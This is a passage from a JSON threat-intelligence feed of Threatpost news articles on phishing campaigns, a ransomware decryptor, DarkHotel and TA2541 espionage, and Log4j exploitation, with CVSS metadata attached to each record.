hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals\n\nto encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure if an email is legitimate or not.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T16:58:20", "description": "A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s[ Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.\n\nThe fact that there was ransomware clinging to the data-wiping malware didn\u2019t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a \u201cbroader intrusion chain.\u201d\n\n> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. <https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade &amp; Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:44", "description": "Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.\n\nThe group, which researchers have dubbed TA2541, typically sends hundreds of thousands of malicious messages \u2013 nearly always in English \u2013 that ultimately deliver a remote-access trojan (RAT) payload using commodity malware to collect data from victims\u2019 machines and networks, according to [a new report](<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>) by Proofpoint released Tuesday. These campaigns have affected hundreds of organizations across the world, with recurring targets in North America, Europe and the Middle East, researchers said.\n\nThough a number of the group\u2019s attacks already have been tracked by various researchers \u2013 including [Microsoft](<https://twitter.com/MsftSecIntel/status/1392219299696152578>), [Mandiant](<https://www.mandiant.com/resources/dissecting-netwire-phishing-campaigns-usage-process-hollowing>), [Cisco Talos](<https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html>), [Morphisec](<https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader>) and others \u2013 since at least 2019, Proofpoint\u2019s latest research shares \u201ccomprehensive details linking public and private data under one threat activity cluster we call TA2541,\u201d researchers wrote.\n\nIndeed, previously reported attacks related to TA2541 include [a two-year spyware campaign](<https://threatpost.com/airline-credential-theft-campaign/174264/>) against the aviation industry using the AsyncRAT called Operation Layover and uncovered by Cisco Talos last September, and a [cyberespionage campaign](<blank>) against aviation targets spreading RevengeRAT or AsyncRAT revealed by Microsoft last May, among others.\n\n## **Five Years and Still Flying High**\n\nProofpoint first started tracking the actor in 2017 when its tactic of choice was to send messages with \u201cmacro-laden Microsoft Word attachments\u201d that downloaded RAT payloads. The group has since tweaked this tactic and now most frequently sends messages with links to cloud services such as Google Drive or OneDrive hosting the payload, according to the report.\n\nHowever, although the approach to how they hide their malicious payload has varied, the group has mostly remained consistent in its choice of targets, lures and the type of payloads it uses, observed Sherrod DeGrippo, vice president of Threat Research &amp; Detection at Proofpoint.\n\n\u201cWhat\u2019s noteworthy about TA2541 is how little they\u2019ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,\u201d she said in an email to Threatpost. \u201cThis group is a persistent threat to targets throughout the transportation, logistics, and travel industries.\u201d\n\nIn terms of which specific RATs are used, attackers tap a variety of low-hanging fruit \u2013 that is, commodity malware that\u2019s available for purchase on criminal forums or available in open-source repositories. Currently, TA2541 prefers to drop AsyncRAT on victims\u2019 machines but also is known to use NetWire, WSH RAT and Parallax, researchers said.\n\nSo far, all of the malware distributed by the group has been aimed at information-gathering purposes and to gain remote control of an infected machine, with researchers acknowledging that they don\u2019t know the threat actor\u2019s \u201cultimate goals and objectives\u201d beyond this initial compromise, they said.\n\n## **Typical Malicious Emails**\n\nA typical malicious message in a TA2541 campaign uses a lure related to some type of logistical or transportation theme related to one of the particular industries it\u2019s targeting, researchers said.\n\n\u201cIn nearly all observed campaigns, TA2541 uses lure themes that include transportation-related terms such as flight, aircraft, fuel, yacht, charter, etc.,\u201d according to the report.\n\nFor example, researchers revealed an email that impersonated an aviation company requesting information on aircraft parts, as well as another that requested info on how to transport a medical patient on a stretcher on an ambulatory flight.\n\nOnce the COVID-19 pandemic hit in March 2020, the group shifted bait tactics slightly and \u2013 like [many other threat actors](<https://threatpost.com/spearphishing-campaign-exploits-covid-19-to-spread-lokibot-infostealer/154432/>) \u2013 adopted [COVID-related lures](<https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/>) consistent with their overall theme of cargo and flight details, researchers noted.\n\n\u201cFor example, they distributed lures associated with cargo shipments of personal protective equipment (PPE) or COVID-19 testing kits,\u201d researchers noted.\n\nHowever, this shift was short-lived, and TA2541 rather quickly returned to its more generic, transportation-related email themes, they added.\n\n## **Current Attack Vector**\n\nIn current campaigns observed by Proofpoint, if victims take the bait, they will usually be directed to click on a Google Drive URL that leads to an obfuscated Visual Basic Script (VBS) file, researchers said.\n\n\u201cIf executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub,\u201d researchers wrote. \u201cThe threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections.\u201d\n\nIn this way, TA2541 collects system information before then downloading the RAT on the host machine, according to the report.\n\nGoogle Drive has been a consistent tool of the threat group, but occasionally TA2541 also will use OneDrive to host the malicious VBS files, researchers said. In late 2021, Proofpoint also observed the group using DiscordApp URLs that link to a compressed file that led to either AgentTesla or Imminent Monitor as an attack vector, researchers said. Indeed, the Discord content delivery network (CDN) has been [an increasingly popular way](<https://threatpost.com/attackers-discord-slack-malware/165295/>) for threat actors to use a legitimate and popular app for nefarious purposes.\n\nOccasionally TA2541 also will use email attachments instead of cloud-based service links, including compressed executables such as RAR attachments with an embedded executable containing URL to CDNs hosting the malware payload, they added.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T14:02:07", "type": "threatpost", "title": "TA2541: APT Has Been Shooting RATs at Aviation for Years", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T14:02:07", "id": "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "href": "https://threatpost.com/ta2541-apt-rats-aviation/178422/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T04:10:46", "description": "Call it a \u201clogjam\u201d of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies\u2019 telemetry using at least 70 distinct malware families \u2014 and the fallout from the Log4j vulnerability is just beginning.\n\nResearchers manning keyboards all over the world have spent the past several days chasing [attacks aimed at a now-infamous Log4j](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) Java library bug, dubbed [Log4Shell (CVE-2021-44228).](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) Side note: Log4j is pronounced, \u201clog forge\u201d \u2014 although that\u2019s disputed, because it\u2019s also referred to in conversation as \u201clog-four-jay.\u201d Dealer\u2019s choice there.\n\nFirst discovered among Minecraft players last week, the newly discovered vulnerability has opened a massive opportunity for threat actors to hijack servers, mostly with coin miners and botnets, but also a cornucopia of other malware such as the [StealthLoader trojan](<https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/>) \u2014 and that\u2019s just so far.\n\n\u201cWe\u2019ve seen a lot of chatter on Dark Web forums, including sharing scanners, bypasses and exploits,\u201d Erick Galinkin, an artificial intelligence researcher at Rapid7, told Threatpost. \u201cAt this point, more than 70 distinct malware families have been identified by us and other security researchers.\u201d\n\nFor instance, Bitdefender researchers this week [discovered](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) that threat actors are attempting to exploit Log4Shell to deliver a new ransomware called Khonsari to Windows machines.\n\nCheck Point research reported Wednesday that since last Friday, its team has detected 1.8 million Log4j [exploit attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on almost half of all corporate networks that they track.\n\nThese threat actors aren\u2019t low-skilled hobbyists. Check Point added that as of Wednesday, Iranian hacking group Charming Kitten, also known as APT 35 and widely believed to be working as a [nation-state actor](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>), is actively targeting seven specific Israeli organizations across the government and business sectors.\n\n\u201cOur reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors\u2019 operations are to be revealed in the coming days,\u201d Check Point added.\n\nMicrosoft meanwhile reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey are actively exploiting Log4Shell (CVE-2021-44228) in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\n\u201cThis activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment and exploitation against targets to achieve the actor\u2019s objectives,\u201d the company said in [a posting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).\n\n## **Is a Log4j Worm Next? **\n\nResearcher Greg Linares meanwhile has reported seeing evidence that a self-propagating worm is being developed and will likely emerge in a day or less.\n\n> [#Log4J](<https://twitter.com/hashtag/Log4J?src=hash&ref_src=twsrc%5Etfw>) based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.\n> \n> Self propagating with the ability to stand up a self hosted server on compromised endpoints.\n> \n> In addition to spraying traffic, dropping files, it will have c2c\n> \n> \u2014 Greg Linares (@Laughing_Mantis) [December 12, 2021](<https://twitter.com/Laughing_Mantis/status/1470165580736987137?ref_src=twsrc%5Etfw>)\n\nThere is wide agreement within the cybersecurity community that he\u2019s correct, but many experts don\u2019t think the fallout will be as bad with Log4j as it was with past incidents like [WannaCry or NotPetya](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cWhile it\u2019s possible that we could see a worm developed to spread among susceptible Log4j devices, there hasn\u2019t been any evidence to suggest this is a priority for threat actors at this time,\u201d Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cDeveloping malware of this nature takes a significant amount of time and effort.\u201d\n\n\u201cThis activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue,\u201d Morgan added.\n\n\u201cIt\u2019s still very much early days with regards to Log4j,\u201d Morgan said. \u201cWhile many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.\u201d\n\nThe emergence of a Log4j worm isn\u2019t the worst-case scenario, researchers like Yaniv Balmas from Salt Security explained to Threatpost.\n\n\u201cWhile not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied,\u201d Balmas said. \u201cEveryone with a basic computer and internet access could launch an attack against millions of online services within minutes. This achieves quite a similar impact as a worm \u2013 it is distributed and unpredictable, and the damage extent might even be higher than a worm since a worm works \u2018blindly\u2019 in an automated manner.\u201d\n\nHe added, \u201cin this other scenario, there are actual humans behind the attacks which may target specific entities or institutions and enable attackers to fine-tune their attacks as they progress.\u201d\n\nThe tireless work being done by security teams to [patch up Log4j against exploits](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) is a big help against the development of any worms on the horizon, John Bambenek, principal threat hunter at Netenrich, told Threatpost.\n\n\u201cThis vulnerability certainly looks wormable, however, the good news is we\u2019ve already had almost a week to start dealing with detection, mitigation [and patching](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>),\u201dBambenek said. \u201cThere will be lots of vulnerable machines out there, but by now a good deal of the vulnerable machines have been handled and many more are protected with web application firewall (WAF) rules (for instance, Cloudflare deployed protection over the weekend). The worst case would have been a worm last week, we\u2019re in a better place now.\u201d\n\n## **Log4j\u2019s Long Tail **\n\nBeyond emergency patching measures, Galinkin explained to Threatpost that his concern is with lingering unpatched devices and systems that will be vulnerable long after Log4j has fallen out of the headlines, particularly in sectors like academia and healthcare.\n\n\u201cOne crucial thing to note about this vulnerability is that it\u2019s going to have an extremely long tail,\u201d he said. \u201cHospitals tend to purchase software once, but sometimes the vendors become defunct \u2014 leading to unsupported software that will never receive a patch.\u201d\n\nHe added, \u201cin academia, loads of software is written once by grad students or professors, but those individuals may not be aware of the bug, or they simply no longer maintain the software \u2014 software that is in use in physics, pharmacology and bioinformatics. This suggests that we will continue to see exploitation of this vulnerability \u2014 potentially in isolated incidents \u2014 long into the future.\u201d\n\n121621 16:21 UPDATE: Corrected spelling of John Bambenek\u2019s name.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T23:18:44", "type": "threatpost", "title": "Relentless Log4j Attacks Include State Actors, Possible Worm", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T23:18:44", "id": "THREATPOST:5CCE0C2607242B16B2880B331167526C", "href": "https://threatpost.com/log4j-attacks-state-actors-worm/177088/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency 